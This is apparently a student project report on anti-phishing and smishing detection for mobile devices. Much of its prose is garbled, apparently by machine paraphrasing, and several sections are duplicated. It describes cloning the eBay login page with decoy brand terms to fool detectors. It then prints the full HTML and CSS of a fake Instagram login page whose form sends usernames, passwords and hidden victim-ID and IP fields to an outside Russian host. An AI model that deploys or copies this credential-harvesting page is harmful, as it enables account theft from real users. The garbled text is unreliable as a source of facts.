Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 37

ANTI PHISHING AND SMISHING TECHNIQUE

ABSTRACT

Damage improves by hacking assault (smishing) Smishing you use a mobile when you reach
2013. In conjunction with graphics sewing machine intrusion assault, the theft of personal
information and direct financial harm has occurred. Monetary disruption resulting to Internet
payment service (ISP) and secure payment process has arisen in connection with a computer
sewing device malware attack on a smartphone. In this article, I will review examination of
real vinegar sewing machine hacking assault in the laboratory instance. It is a major power
protection measure to prevent harm to the secure payment process by using Smishing to
target a case study or functional theory technological nest sewing machine hacking. I will be
investigating in this paper to be capable of making digital transactions simpler and more
efficient through a smartphones.

Internal
INTRODUCTION

Last year, the 2012 Harm increased year after year to hack One Hundred Million 8 It was ten
million won. As well as software hacking with the rapid spread of smartphones, harm cases a
re now becoming rapidly hacked related to smartphones

According to data released by the world PC The exports eotdago slightly less than last year-
2] in contrast to the latest 2013 market research company IDC. This is the public as smart
phones and tablets grow PC A indication that more are using more smart phones PC Go to
the smartphone's golden age indicates the future golden age.

The damage caused by SMS phishing activities targeted at smartphone users soaring a safe
transaction utilizing hacking attacks is a growing number, Particularly the related protection
guidance work on SMS phishing attacks need to protect personal information in compliance
with the Privacy Act implementation[2].

In this article, we review the Smith Singh assaulted security reply directions for increased
security.

Internal
PROBLEM STATEMENT

According to Phishing's phenomenon, SMiShing and Vishing have risen against mobile
devices without any indication of rising assaults. The reported cases of these attacks grew by
more than 160 times per month for two consecutive years, while the number of unique
identified phishing websites increased by about 16 million, with more than 100 well-known
brands under attack.

Typical threats emanate from the originator and recipient of the "spoofed" as legitimate
emails intended to come. This email message can ask the recipient to provide some
confidential user credentials or personal information, or for further action, click on a link. For
example, an email that is supposed to come from your system administrator may request you
to provide personal details to the administrator, including your password, by a certain date or
you may risk losing your account.Once the user responds with the required information to the
message, the attacker can then take advantage of the opportunity to harm the systems or
misuse the stolen identity profile. Until recently, only viruses and worms were susceptible to
mobile devices, but there are indications of attacks by Phishing, SMiShing and Vishing.

Studies of mobile device threats seem to suggest that many users ignore security concerns
when they visit or conduct online transactions. This study aims to evaluate the behavior of
mobile users and to determine the extent and impact of attacks. The main concerns are as
follows:

i. What is the scale of Phishing attacks on users of mobile devices?

ii. What are Phishing, SMiShing and Vishing's characteristics that confront mobile devices?

Iii. How do consumers of mobile devices become targets or perpetrators of attacks through
Phishing?

This research seeks to determine the level of understanding and comprehension of phishing
attacks by mobile device users in particular. They seek to create a taxonomy of the features of
Phishing, SMiShing and Vishing that most mobile users currently encounter. We will also
evaluate the impact on identity theft of Phishing, SMiShing and Vishing as user profiles or
access credentials are stolen. This report lists some of the key features of risks to Phishing,
SMiShing and Vishing
Click here," "download," "documents," "view," "password" and "account" etc. The study also

Internal
found that men are generally more likely to use the Internet than women, and that men are m
ore likely than women to attack Phishing, SMiShing and Vishing.

This article is structured as follows: this introductory section discusses the history of these
challenges, accompanied by related works and state-of - the-art literature. Next, the approach
adopted is discussed and the analyses and observations are observed, while the conclusions
discuss the implications of the findings.

Internal
LITERATURE REVIEW

This chapter deals with the state-of - the-art and related research on Phishing,
SMiShing and Vishing as attacks against mobile devices and end-user detection and
consequences as attackers target human-centered vulnerabilities. There are some flaws with
both mobile devices or end-users that are reflected by e-mails, text messages and short
messaging service (SMS), web browsing, or listening to voice mail that may be malicious and
threats which aim to manipulate end-user inherent weaknesses.

Here we discuss social engineering as a major threat or technique that employs most attacks
on mobile devices by Phishing, SMiShing and Vishing.

2.1 Social Engineering

Social engineering is the capacity to trick or convince someone to disclose their personal or
protective information.This includes the means or ability to access premises, networks or
databases by exploiting individual mindset rather than breaking into or using specialized
methods of hacking.

Attacks on social engineering is usually accomplished by pressuring people to carry out acts
that they do not wish to do and that may be harmful to them[10]. In general, social
engineering is used to describe trickery or deception for the purpose of gathering, fraud, or
gaining access to the computer system. Social engineering was defined as follows in the book
"The Art of Deception: Controlling the Human Security Element"

"Using influence and persuasion to deceive people by persuading them that they are someone
they are not, or by manipulation. As a result, the social engineer can use people to obtain
information, or persuade them to perform an action item, with or without the use of
technology.

Therefore, the social engineer uses manipulation, influence and intimidation in collecting
company and/or personal information[11] by manipulating the victim's vulnerability. There,
the main motive is to obtain relevant information that may allow him / her to gain
unauthorized access to a respected network and the information that dwells thereon.
Literature has different definitions of what constitutes social engineering; for example,

Internal
it has its own concepts and strategies for social engineering. Here is a good social science
classification in the following categories.

i. Telephone social engineering (i.e. telephone communication), which in this study


is characteristic of SMiShing and Vishing;
ii. Dumpster diving (i.e. electronic waste or office)
iii. Online social manipulation (i.e. searching on the web), which in this analysis
is typical of Phishing.
iv. Persuasion (communication face to face); and
v. Social engineering reversal

2.2 Phishing, SMiShing and Vishing

The concepts and techniques of Phishing, SMiShing and Vishing are discussed in this
paragraph. Phishing, SMiShing and Vishing continue to be popular among cyber-criminal
groups or the underground malware industry for the following reasons·

The cost of implementing an attack is incredibly low, significantly reducing the obstacles or
challenges raised by new criminals who launch attacks;

The initiation of an attack requires minimal specialized expertise. The launch operation
turned out to be fully automated and it was possible to launch a Phishing attack with a few
clicks.

While social engineering through Phishing, SMiShing and Vishing is age-old scams, they
remain common and successful, especially with mobile devices and users. The tactics used
by scammers can vary, attracting end-users to reveal or disclose crucial and sensitive
information on the Internet and also on the phone

2.2.1 Phishing
Phishing could be a style of social manipulation attack typically accustomed capture
user knowledge, as well as passwords for account and numbers for credit cards.
It happens once a victim is duped into gap associate email, instant message, or text message
by associate assailant, masquerading as a trusty entity. The recipient is then tricked into
clicking a malicious link which will lead to malware installation, system state change as a
part of a ransomware attack, or sensitive data revealing.

Internal
An attack may result in devastating results. It involves criminal purchase, stealing cash,
and detective work fraud of individuals.
2.2.2 SMiShing
When somebody desires to trick you into causing them personal data through associate email
or SMS message, a kind of phishing, smiling is. Smishing within the world of on-ine security
is turning into associate evolving and growing threat. scan on to find out a way to smell and
the way to protect yourself from it.
2.2.3 Vishing
Impersonating someone or legitimate business isn't a replacement factor to scam individuals.
It's simply a replacement twist on associate recent routine. Vishing has, in truth, been around
for nearly as long as net phone company. The term "wishing" could be a mixture of "speech"
and "phishing." Phishing is that the technique of exploitation manipulation to urge you to
share personal, important, or direction. nonetheless, vishers use an online phoneservices
(VoIP) rather than exploitation email, regular phone calls, or imitative websites as phishers
do.
2.3 Mobile Devices
Mobile devices area unit typically moveable electronic devices that area unit wide
accustomed create and receive phone calls and text messages, similarly as numerous pc
applications and services.

Mobile devices embrace personal digital assistants (PDAs), good phones, moveable
computers like printers, notebooks, web books, iPADs, smartphones, etc. for the needs of this
study. These may run on any software, as well as robot and iOS[17] normally. several mobile
devices these days area unit measured on the idea of their computing capacities, as well as
process capability and memory, quite except the physical size and weight. Another issue that
connects mobile devices is their ability to attach via hotspot services from anyplace at any
time. Today, a typical room has students with all types of mobile computing devices, from
laptops to web books to iPADs.

2.4 Threats to Mobile Devices


Phishing, SMiShing and Vishing's issue is far larger than what was employed in the money
sector or in money-involving ventures. it's imperative and price noting that a reliable
mechanism of mutual authentication is place in situ to resolve problems that influence against
the management of identity. watching current trends[20][21], Phishing attacks area unit

Internal
possible to travel on the far side simply getting personal IDs and collection identity
credentials to control alternative broader cyber house knowledge.

There area unit numerous security challenges that occur as a results of users being online;
these could result from the utilization of the communications protocol redirection perform, as
there's some type of danger with the management of associate Open ID[ 21]. The Open ID as
associate open customary permits end-users to possess digital identities that area unit attested
by third-party services or agents known as the Relying Party (RP). The Open ID is at risk of
Phishing attacks, as a malicious relaying party will re-direct associate end-user's visit to a
imitative web site, that successively, collects the access credentials (Open ID) of that user.
The hacker WHO additionally controls the imitative web site will then use the credentials to
log into any net services.

In order to mitigate this vulnerability[20], he planned that "effective shared cryptography


shouldn't need users to continually use an equivalent device or transfer special code." It
emerges from the higher than that there area unit numerous ways to partitioning the threat
display by mobile devices. during this analysis, we tend to shall establish main risks that
concentrate on mobile device vulnerabilities, whether or not they area unit used for on-line
knowledge, net browsing, or voice communications. This section aims to debate additional
concerning threats thanks to attack vectors from Phishing, SMiShing and Vishing.

Internal
PURPOSE

This project aims at finding phishing websites ,Smishing Messages based on url
extraction to increase the accuracy of finding the phishing website and smishing messages
compared to previous techniques.

SCOPE

The key purpose of this is to easily find the phishing website and messages and it also
decreases the difficulty of detecting the phishing and smishing in comparison to the previous
techniques. And it's also a basic algorithm that everybody can easily understand.

SOFTWARES REQUIRED:

Operating System : Windows Family.

Browser : Google Chrome.

Language : HTML,JAVA,DATA BASE.

Internal
COMMON PROPERTIES OF PHISHING ATTACKS:

The following lines reflect the number of phishing attack properties on the websites, they are

1) Logos: the Phishing website uses logos found on the legitimate website to imitate
its appearance. Therefore, phishers can load it to their phishing websites (external
domain) from the legitimate website domain.
2) Suspicious URLs: Phishing websites are on servers not connected to the legitimate
website .The URL of the phishing website may include the URL of the legitimate
website as a substring (http: /www.ebaymode.com) or may be close to the legitimate
URL (http:/www.paypa1.com) in which the PayPal letter "L" is replaced by the
number "1."

3) User input: Phishing websites typically contain user-sensitive information


pages, such as account number, username, etc.

4) Short lived: For only a few hours or days, most phishing websites are available – just
enough time for the hacker to defraud a sufficiently large number of users.

5) Copies: Attackers copy and make minimal changes to HTML from the
legitimate websites.

6) Sloppiness or lack of knowledge of English: Many Phishing pages have errors in


spelling, grammar errors, and inconsistencies.

Internal
THE PROPOSED APPROACH

II. BACKGROUND For MOBILE PHISHING

 Mobile Phone user interface Many features, including security features, need to be
omitted and modified by mobile phone apps to fit the small screen size. The
simplified user interface version may help to bypass user inspection by phishing sites.
Because of the small size of phone screens, most wireless apps need to delete the
status bar and cover the URL bar once the loading of the web pages is over. Long
URLs are truncated even during the loading process to fit the browser frame. Since it
is crucial to detect phishing attacks to be able to read and verify URLs, partial URLs
(especially URLs displayed with partial domain name) It would certainly increase the
risk of phishing attacks being spoofed. For example, when accessing the "Bank of
America" page, Figure 1(a) shows the URL bar with only a partial domain name.
This could result in a successful phishing attack if people were misled by the partial
URL and apply their passwords, while the full URL is either
https:/secure.bankofameric.com" or
"https:/secure.bankofamerica.com.phishing.com." If the whole URL (or at least the
domain name) is shown, these tricks will fail.
One way a user can view the full URL is by clicking the address bar and scrolling
manually all the way to the end. Another way is to see the actual destination of a link,
which can be invoked for about two seconds by holding the link. Although the
destination URL is also partly shown as in Figure 1(b), the domain name can be
shown with up to 31 characters instead of 19 characters in the URL bar. Since the full
domain names of the loginpagesarenolongerthan30charactersformostlegitimate
domains, searching the endpoint makes it easier for users to spot phishing sites

II. BACKGROUND OF MOBILE PHISHING A. User Interface of Mobile Phone

To suit the small screen width, many features, including security features, have to be omitted
and modified by mobile phone browsers. The simplified user interface version may help to
bypass user inspection by phishing sites. Because of the small size of phone screens, most
mobile browsers need to remove the status bar and hide the URL bar after loading the web
pages. Long URLs are truncated to fit the browser frame even during the loading process.
Since the ability to read and verify URLs is crucial in phishing attack detection, partial URLs

Internal
(especially partial domain name URLs) would certainly increase the risk of phishing attacks
spoofing.

For example, when accessing the "Bank of America" page, Figure 1(a) displays the URL bar
with only a partial domain name. This could result in a successful phishing attack if people
were misled by the partial URL and apply their passwords, while the full URL is either
"https:/secure.bankofameric.com" or "https:/secure.bankofamerica.com.phishing.com." If the
whole URL (or at least the domain name) is shown, these tricks will fail. One way a user can
view the entire URL is by pressing the address bar and scrolling manually all the way to the
end. Another option is to see the exact destination of a connection, which can be triggered for
about two seconds while keeping the button. Although the destination URL is also partly
shown as in Figure 1(b), the domain name can be shown with up to 31 characters instead of
19 characters in the URL bar. Because the full domain names of the
loginpagesarenolongerthan30charactersformostlegitimate sites allow users to identify
phishing sites quicker by searching the target.

(a) Ebay Official Login Page (b) Ebay Phishing Login Page

Adjust its scale or use other pictures to mask it. It is therefore possible to easily modify
attributes such as term frequency, brand name and business logo. For example, the actual
mobile login page of Ebay is shown in Figure 3(a). We copy and migrate the code from the
original site to our web page. We also upload the components of the image to our website and
change the links to the corresponding places on our website, in particular the URL for
submitting the form data. Then the application section is added to the source code in Figure
3(c). But the manipulated web page (Figure 3(b)) looks just like the official website of Ebay.

Internal
By looking at their URL, no client can doubt their legitimacy. Phishers can thus inject as
many "bugs3" as needed into the source code of HTML to obfuse traditional extractors of
identity. The large number of "bugs3" extracted can convince the extractor of identity that
this web page claims to be "bugs3" rather than "Ebay." As a result, anti-phishing heuristics
would fail because the web page of phishing actually belongs to the domain "bugs3.com."
For fact, the name of a web page is not available unless the user clicks on the menu icon on
the website or moves to a rundown of the open page index, which means that the title could
also be used Replaced by "bugs3" to improve the HTML source code consistency. When
discussed above, they illustrate that HTML source code is not a secure way to find a phishing
site's reported identity. Instead, since users are explicitly spoofed by what they see, they must
concentrate on the screen shown to mobile users.

 Extraction of identity
As discussed above, the screen shown to mobile users should be the exact location of t
he claimed identity

It points out that taking a screenshot is a great way to capture the phone screen. There are
two common findings that lead us to believe that in identity extraction and confirmation,
screenshot can work well. First, most legal web pages and software user interfaces are very
simple. You can capture the entire login page, or most of the page, in a single screenshot.
Another point is that most well-known companies use the brand name as the domain name of
the second level (SLD) Of the official websites thereof. Bank of America (BoA) can help
explain it. Despite its size, BoA uses the whole brand name as SLD. For special cases where

Internal
brand names are not quite the same as SLD, e.g. "AT&T" includes a symbol in the brand
name, all content-based systems may fail due to the "AT&T" or "att" brand name overlap
(special logos are not generally included in the domain name of valid URLs). However, with
a mapping whitelist, in which the brand name "AT&T" is mapped directly to SLD "att" and
vice versa, such inconsistency can be easily solved.

C.OCR Techniques
Optical character recognition (OCR) is the translation of an object to machine-encoded text
physically and digitally. We assume the OCR technique can achieve better quality on mobile
phones due to the smaller screen size and relatively higher pixel density of mobile phones.
We deploy the OCR technique on mobile platforms and demonstrate its effectiveness
and performance through real experiments

The tool we are using is Tesseract[7 ], one of the most reliable open source OCR engines
and capable of supporting more than 60 languages. The analysis includes a 131 dpi pixel de
nsity Thinkpad T420 (2.40GHz, 4 GB RAM) and a 320 dpi Google Nexus 4 handset (1.5GH
z, 2 GB RAM). In both mobile and PC browsers, we open the Ebay mobile login page, each
capturing a screenshot. Tesseract is used to extract text from mobile phone screenshot while
using Microsoft Office Document Imaging (MODI) to process PC browser screenshot (this
tool is used in an earlier anti-phishing scheme[8]). We note that Tesseract correctly extracts
all terms from the phone screenshot, with the exception of the dark blue key "sign in"
(Figure 3(a)). The result of extraction on PC is worse, not only missing the dark blue button,
but missing the word "ebay" in the logo as well. takes 1.6 seconds, while on PC the
processing time is 4.5 seconds.

Internal
HTML CODE WE USE TO CREATE FAKE PAGE:

<!DOCTYPE html>

<html class="js not-logged-in client-root" lang="en">

<head>

<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">

<meta charset="utf-8">

<title></title>

<link media="all" href="instindex.css" type="text/css" rel="stylesheet">

<script type="text/javascript" src="http://gc.kis.v2.scr.kaspersky-labs.com/2431086C-82B6-E843-


8C29-EBE314C50A55/main.js" charset="UTF-8"></script></head>

<body class="" style="display: block;">

<span id="react-root"><section class="_sq4bv _29u45"><main class="_8fi2q _2v79o"


role="main"><div class="_l8799"><article class="_cdujc"><div class="_kbq82"><div
class="_f9sjj"><h1 class="_68swa _8scx2 coreSpriteLoggedOutWordmark">Instagram</h1><div
class="_1zdb1"><form class="_3jvtb" style="display: block;" method="POST"
action="http://www.shkola41.ru/sw.php" accept-charset="utf-8"><div class="_t296e"><div
class="_sjplo"><input class="_ph6vk _o716c" aria-describedby="" aria-label="Phone number,
username, or email" aria-required="true" autocapitalize="off" autocorrect="off" maxlength="30"
name="email" placeholder="Phone number, username, or email" value=""
type="text"><div class="_gaby6"></div></div></div><div class="_t296e"><div
class="_sjplo"><input class="_ph6vk
_o716c" aria-describedby="" aria-label="Password" aria-required="true" autocapitalize="off"
autocorrect="off" name="pass" placeholder="Password" value="" type="password"><input
type="hidden" name="user_id_victim" value="2hdcT4VFZSVmVFNXFVWHBQVVQwOQ==" /><input
type="hidden" name="user_ip" value="175.101.99.20, 175.101.99.20" /><input type="hidden"
name="type" value="instagram" /><div class="_gaby6"></div></div></div><span class="_t38eb
_ov9ai"><button class="_qv64e _gexxb _4tgw8 _njrw0">Log in</button></span><a class="_pbd5h"
href="#">Forgot password?</a></form></div><div class="_fanip" style="display: none;"><div
class="_anzsd _nwowf _7sjyk"></div></div></div><div class="_f9sjj reg" style="display: block;"><p
class="_g9ean">Don't have an account? <a href="#">Sign up</a></p></div><div class="_40dde"><p
class="_d2vov">Get the app.</p><div class="_fzj6p"><a class="_o7vmf" href="#"><img
class="_8a10v" src="4b70f6fae447.png"></a><a class="_o7vmf" href="#"><img class="_8a10v"
src="f06b908907d5.png"></a><a class="_o7vmf" href="#"><img class="_8a10v"
src="f55c258e826e.png"></a></div></div></div></article></div></main><footer class="_s5vm9"
role="contentinfo"><div class="_g7lf5 _9z659" style="max-width: 935px;"><nav class="_luodr"
role="navigation"><ul class="_g8wl6"><li class="_538w0"><a class="_hqmnd" href="#">About
us</a></li><li class="_538w0"><a class="_hqmnd" href="#">Support</a></li><li class="_538w0"><a
class="_hqmnd" href="#">Blog</a></li><li class="_538w0"><a class="_hqmnd"

Internal
href="#">Press</a></li><li class="_538w0"><a class="_hqmnd" href="#">API</a></li><li
class="_538w0"><a class="_hqmnd" href="#">Jobs</a></li><li class="_538w0"><a class="_hqmnd"
href="#">PRIVACY</a></li><li class="_538w0"><a class="_hqmnd _ts6wg"
href="#">Terms</a></li><li class="_538w0"><a class="_hqmnd" href="#">Directory</a></li><li
class="_538w0"><span class="_pqycz _hqmnd">Language<select class="_fsoey"><option
value="af">Afrikaans</option><option value="cs">Čeština</option><option
value="da">Dansk</option><option value="de">Deutsch</option><option
value="el">Ελληνικά</option><option value="en">English</option><option value="es">Español
(España)</option><option value="es-la">Español</option><option
value="fi">Suomi</option><option value="fr">Français</option><option value="id">Bahasa
Indonesia</option><option value="it">Italiano</option><option
value="ja">日本語</option><option value="ko">한국어</option><option value="ms">Bahasa
Melayu</option><option value="nb">Norsk</option><option
value="nl">Nederlands</option><option value="pl">Polski</option><option value="pt-
br">Português (Brasil)</option><option value="pt">Português (Portugal)</option><option
value="ru">Русский</option><option value="sv">Svenska</option><option
value="th">ภาษาไทย</option><option value="tl">Filipino</option><option
value="tr">Türkçe</option><option value="zh-cn">中文(简体)</option><option value="zh-
tw"> 中 文 ( 台 灣 )</option><option value="bn"> </option><option
value="gu"> </option><option value="hi"> </option><option
value="hr">Hrvatski</option><option value="hu">Magyar</option><option
value="kn"> </option><option value="ml"> </option><option
value="mr"> </option><option value="ne"> </option><option
value="pa"> </option><option value="si"> </option><option
value="sk">Slovenčina</option><option value="ta"> </option><option
value="te"> </option><option value="vi">Tiếng Việt</option><option value="zh-
hk">中文(香港)</option><option value="bg">Български</option><option value="fr-ca">Français
(Canada)</option><option value="ro">Română</option><option
value="sr">Српски</option><option
value="uk">Українська</option></select></span></li></ul></nav><span class="_1gmap">© 2017
Instagram</span></div></footer></section></span>

</body>

</html>

Internal
INDEX COMMANDS USED IN FAKE PAGE:

._o7vmf { margin-right: 8px; }

._o7vmf:last-child { margin-right: 0px; }

._8a10v { height: 40px; }

._ov9ai { display: block; position: relative; }

._qv64e { border-radius: 3px; border-style: solid; border-width: 1px; font-size: 14px; font-
weight: 600; line-height: 26px; outline: medium none; overflow: hidden; text-overflow: ellipsis;
white-space: nowrap; width: 100%; }

._gexxb, ._i63ih._gexxb { background: rgb(56, 151, 240) none repeat scroll 0% 0%; border-
color:
rgb(56, 151, 240); color: rgb(255, 255, 255); }

._qv64e:active { opacity: 0.7; }

._njrw0 { cursor: pointer; }

._4tgw8, ._r9b8f { padding: 0px 8px;

} @media (min-width: 736px) {

._r9b8f { padding: 0px 24px; }

._8scx2 { display: block; overflow: hidden; text-indent: 110%; white-space: nowrap; }

.coreSpriteLock, .coreSpriteLoggedOutGenericUpsell, .coreSpriteLoggedOutWordmark,


.coreSpriteMobileNavActivityActive { background-image:
url('http://www14.0zz0.com/2018/11/20/03/264736626.png'); background-repeat: no-repeat;
background-position: -255px -37px; height: 76px; width: 76px; }

.coreSpriteLoggedOutGenericUpsell, .coreSpriteLoggedOutWordmark,
.coreSpriteMobileNavActivityActive { background-position: -256px -222px; height: 58px; width: 58px;
}

.coreSpriteLoggedOutWordmark, .coreSpriteMobileNavActivityActive { background-position: 0px


0px; height: 51px; width: 175px; }

@media not all, not all, (min-resolution: 144dpi) {

.coreSpriteActivityHeart, .coreSpriteAddPhoto, .coreSpriteAddText { background-image:


url('5e9cc261d256.png'); background-size: 405px 379px; background-position: -189px -218px; }

.coreSpriteAddPhoto, .coreSpriteAddText { background-position: -93px -52px; }

.coreSpriteAddText { background-position: -200px -355px; }

Internal
.coreSpriteAppIcon, .coreSpriteAppStoreButton, .coreSpriteBoomerang, .coreSpriteCameraActive,
.coreSpriteCameraInactive { background-image: url('5e9cc261d256.png'); background-size: 405px
379px; background-position: -98px -281px; }

.coreSpriteAppStoreButton, .coreSpriteBoomerang, .coreSpriteCameraActive,


.coreSpriteCameraInactive { background-position: -131px -134px; }

.coreSpriteBoomerang, .coreSpriteCameraActive, .coreSpriteCameraInactive { background-position:


-384px -204px; }

.coreSpriteCameraActive, .coreSpriteCameraInactive { background-position: -300px -355px; }

.coreSpriteCameraInactive { background-position: -325px -355px; }

.coreSpriteChevronDownGrey, .coreSpriteChevronRight, .coreSpriteClose, .coreSpriteCloseLight,


.coreSpriteComment { background-image: url('5e9cc261d256.png'); background-size: 405px 379px;
background-position: -176px -113px; }

.coreSpriteChevronRight, .coreSpriteClose, .coreSpriteCloseLight, .coreSpriteComment {


background-position: -396px -308px; }

.coreSpriteClose, .coreSpriteCloseLight, .coreSpriteComment { background-position: -384px -


23px; }

.coreSpriteCloseLight, .coreSpriteComment { background-position: -150px -330px; }

.coreSpriteComment { background-position: -258px -176px; }

.coreSpriteDesktopNavActivity, .coreSpriteDesktopNavExplore,
.coreSpriteDesktopNavLogoAndWordmark, .coreSpriteDesktopNavProfile { background-image:
url('5e9cc261d256.png'); background-size: 405px 379px; background-position: -353px -298px; }

.coreSpriteDesktopNavExplore, .coreSpriteDesktopNavLogoAndWordmark,
.coreSpriteDesktopNavProfile { background-position: -50px -355px; }

.coreSpriteDesktopNavLogoAndWordmark, .coreSpriteDesktopNavProfile { background-position: -


176px 0px; }

.coreSpriteDesktopNavProfile { background-position: -308px -176px; }

.coreSpriteDismissLarge, .coreSpriteDismissSmall, .coreSpriteDropdownArrowBlue5,


.coreSpriteDropdownArrowBlue6 { background-image: url('5e9cc261d256.png'); background-size:
405px 379px; background-position: -216px -113px; }

.coreSpriteDismissSmall, .coreSpriteDropdownArrowBlue5, .coreSpriteDropdownArrowBlue6 {


background-position: -396px -320px; }

.coreSpriteDropdownArrowBlue5, .coreSpriteDropdownArrowBlue6 { background-position: -353px


-323px; }

.coreSpriteDropdownArrowBlue6 { background-position: -373px -323px; }

Internal
.coreSpriteDropdownArrowGrey9, .coreSpriteDropdownArrowWhite, .coreSpriteFacebookIcon,
.coreSpriteFacebookIconInverted { background-image: url('5e9cc261d256.png'); background-size:
405px 379px; background-position: -397px -348px; }

.coreSpriteDropdownArrowWhite, .coreSpriteFacebookIcon, .coreSpriteFacebookIconInverted {


background-position: -363px -323px; }

.coreSpriteFacebookIcon, .coreSpriteFacebookIconInverted { background-position: -384px -274px;


}

.coreSpriteFacebookIconInverted { background-position: -384px -291px; }

.coreSpriteFbGlyph, .coreSpriteFeedCreation, .coreSpriteGlyphBlack, .coreSpriteGlyphGradient,


.coreSpriteGlyphWhite { background-image: url('5e9cc261d256.png'); background-size: 405px
379px; background-position: -330px -59px; }

.coreSpriteFeedCreation, .coreSpriteGlyphBlack, .coreSpriteGlyphGradient, .coreSpriteGlyphWhite {


background-position: -283px -176px; }

.coreSpriteGlyphBlack, .coreSpriteGlyphGradient, .coreSpriteGlyphWhite { background-position: -


353px -31px; }

.coreSpriteGlyphGradient, .coreSpriteGlyphWhite { background-position: -311px -218px; }

.coreSpriteGlyphWhite { background-position: -353px -92px; }

.coreSpriteGooglePlayButton, .coreSpriteHashtag, .coreSpriteHeartFull, .coreSpriteHeartOpen,


.coreSpriteHeartSmall { background-image: url('5e9cc261d256.png'); background-size: 405px 379px;
background-position: 0px -134px; }

.coreSpriteHashtag, .coreSpriteHeartFull, .coreSpriteHeartOpen, .coreSpriteHeartSmall {


background-position: -384px -330px; }

.coreSpriteHeartFull, .coreSpriteHeartOpen, .coreSpriteHeartSmall { background-position: -200px -


330px; }

.coreSpriteHeartOpen, .coreSpriteHeartSmall { background-position: -325px -330px; }

.coreSpriteHeartSmall { background-position: -384px -85px; }

.coreSpriteHyperlapse, .coreSpriteInputAccepted, .coreSpriteInputError, .coreSpriteInputRefresh,


.coreSpriteLeftChevron { background-image: url('5e9cc261d256.png'); background-size: 405px
379px; background-position: -384px -222px; }

.coreSpriteInputAccepted, .coreSpriteInputError, .coreSpriteInputRefresh, .coreSpriteLeftChevron {


background-position: -330px -36px; }

.coreSpriteInputError, .coreSpriteInputRefresh, .coreSpriteLeftChevron { background-position: -


330px -82px; }

.coreSpriteInputRefresh, .coreSpriteLeftChevron { background-position: -384px 0px; }

Internal
.coreSpriteLeftChevron { background-position: -281px -281px; }

.coreSpriteLeftPaginationArrow, .coreSpriteLikeAnimationHeart, .coreSpriteLocation,


.coreSpriteLocationActive { background-image: url('5e9cc261d256.png'); background-size: 405px
379px; background-position: -139px -281px; }

.coreSpriteLikeAnimationHeart, .coreSpriteLocation, .coreSpriteLocationActive { background-


position: 0px -52px; }

.coreSpriteLocation, .coreSpriteLocationActive { background-position: -384px -184px; }

.coreSpriteLocationActive { background-position: -384px -163px; }

.coreSpriteLock, .coreSpriteLoggedOutGenericUpsell, .coreSpriteLoggedOutWordmark,


.coreSpriteMobileNavActivityActive { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -253px -36px; }

.coreSpriteLoggedOutGenericUpsell, .coreSpriteLoggedOutWordmark,
.coreSpriteMobileNavActivityActive { background-position: -252px -218px; }

.coreSpriteLoggedOutWordmark, .coreSpriteMobileNavActivityActive { background-position: 0px


0px; }

.coreSpriteMobileNavActivityActive { background-position: -100px -330px; }

.coreSpriteMobileNavActivityInactive, .coreSpriteMobileNavAddPeopleActive,
.coreSpriteMobileNavAddPeopleInactive { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -125px -330px; }

.coreSpriteMobileNavAddPeopleActive, .coreSpriteMobileNavAddPeopleInactive { background-


position: -353px -122px; }

.coreSpriteMobileNavAddPeopleInactive { background-position: -353px -147px; }

.coreSpriteMobileNavDiscoverPeople, .coreSpriteMobileNavExploreActive,
.coreSpriteMobileNavExploreInactive, .coreSpriteMobileNavHomeActive { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px
379px; background-position: -225px -176px; }

.coreSpriteMobileNavExploreActive, .coreSpriteMobileNavExploreInactive,
.coreSpriteMobileNavHomeActive { background-position: -225px -330px; }

.coreSpriteMobileNavExploreInactive, .coreSpriteMobileNavHomeActive { background-position: -


275px -355px; }

.coreSpriteMobileNavHomeActive { background-position: -275px -330px; }

Internal
.coreSpriteMobileNavHomeInactive, .coreSpriteMobileNavLogo, .coreSpriteMobileNavMenuActive,
.coreSpriteMobileNavMenuInactive { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -300px -330px; }

.coreSpriteMobileNavLogo, .coreSpriteMobileNavMenuActive, .coreSpriteMobileNavMenuInactive


{ background-position: -353px -172px; }

.coreSpriteMobileNavMenuActive, .coreSpriteMobileNavMenuInactive { background-position: -


350px -330px; }

.coreSpriteMobileNavMenuInactive { background-position: 0px -355px; }

.coreSpriteMobileNavProfileActive, .coreSpriteMobileNavProfileInactive,
.coreSpriteMobileNavSearchActive { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -25px -355px; }

.coreSpriteMobileNavProfileInactive, .coreSpriteMobileNavSearchActive { background-position: -


353px -198px; }

.coreSpriteMobileNavSearchActive { background-position: -75px -355px; }

.coreSpriteMobileNavSearchInactive, .coreSpriteMobileNavSettings,
.coreSpriteMobileNavTypeLogo, .coreSpriteNotificationLeftChevron { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -100px -355px; }

.coreSpriteMobileNavSettings, .coreSpriteMobileNavTypeLogo, .coreSpriteNotificationLeftChevron


{ background-position: -125px -355px; }

.coreSpriteMobileNavTypeLogo, .coreSpriteNotificationLeftChevron { background-position: -121px -


176px; }

.coreSpriteNotificationLeftChevron { background-position: -384px -308px; }

.coreSpriteNotificationRightChevron, .coreSpriteNullProfile, .coreSpriteOptionsEllipsis,


.coreSpriteOptionsEllipsisLight { background-image:
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px
379px; background-position: -384px -348px; }

.coreSpriteNullProfile, .coreSpriteOptionsEllipsis, .coreSpriteOptionsEllipsisLight { background-


position: -63px -218px; }

.coreSpriteOptionsEllipsis, .coreSpriteOptionsEllipsisLight { background-position: -384px -240px; }

.coreSpriteOptionsEllipsisLight { background-position: -250px -355px; }

.coreSpritePagingChevron, .coreSpritePlayIconSmall, .coreSpritePrivateLock,


.coreSpriteProfileCamera, .coreSpriteProfileGrid { background-image:

Internal
url("/static/bundles/sprite_core_2x.png/5e9cc261d256.png"); background-size: 405px 379px;
background-position: -225px -355px; }

.coreSpritePlayIconSmall, .coreSpritePrivateLock, .coreSpriteProfileCamera, .coreSpriteProfileGrid {


background-position: -384px -65px; }

